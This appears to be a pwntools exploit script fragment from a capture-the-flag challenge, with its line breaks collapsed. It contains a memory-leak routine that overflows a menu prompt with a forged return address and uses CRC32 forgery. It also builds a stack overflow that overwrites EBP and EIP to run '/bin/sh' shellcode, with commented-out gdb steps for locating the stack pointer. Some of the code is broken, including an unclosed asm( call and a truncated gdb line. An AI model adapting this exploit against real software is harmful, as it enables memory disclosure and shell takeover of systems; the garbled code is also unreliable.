def leak(str, addr, dest): #leak qword n = (dest - addr -8)/4 + 2 print n res = '' for i in range(n): r.recvuntil('# ') r.send('1\n') r.recvuntil('How many dounts you want? ') r.send('x'*2040 + p64(addr) + 'aaaaaaaa\n') r.recvuntil('# ') r.send('3\n') r.recvuntil('Input your local system timestamp: ') r.send('aaa\n') r.recvuntil('Response: ') x = int(r.recvuntil('\n')[:-1], 16) x = crc32.forge(x, str, 8)[8:] # print hex(u32(x)) # print b2a_hex(x) str = str[4:]+x res += x addr += 4 # print 'str',b2a_hex(str) # print b2a_hex(res) return u64(res[-8:])
esp = 0xffffdc5c sc = cyclic(0x100) # If we just let it crash by not patching out any values, # we see that the register state looks like this: # # EBP: 0x61736161 (b'aasa') # EIP: 0x61746161 (b'aata') # # Shellcode would be aftter that ('aaua') sc = sc.replace('aasa', p32(esp + 0)) # EBP sc = sc.replace('aata', p32(esp + 4)) # EIP # Add in our '/bin/sh' shellcode sc = sc.replace('aaua', asm( forged = forge(0xe1ca95ee, sc) # # Find out ESP with this, by setting a breakpoint on # 080484EC and examining ESP. # # gdb ="bash gdb %s $'%s'" % (binary, forged)) # gdb.send(""" # set prompt # break *0x080484EC # run # """) # gdb.clean(2) # gdb.sendline('printf "%p\\n",$sp') # esp = gdb.recv().strip() #"ESP: %s" % esp)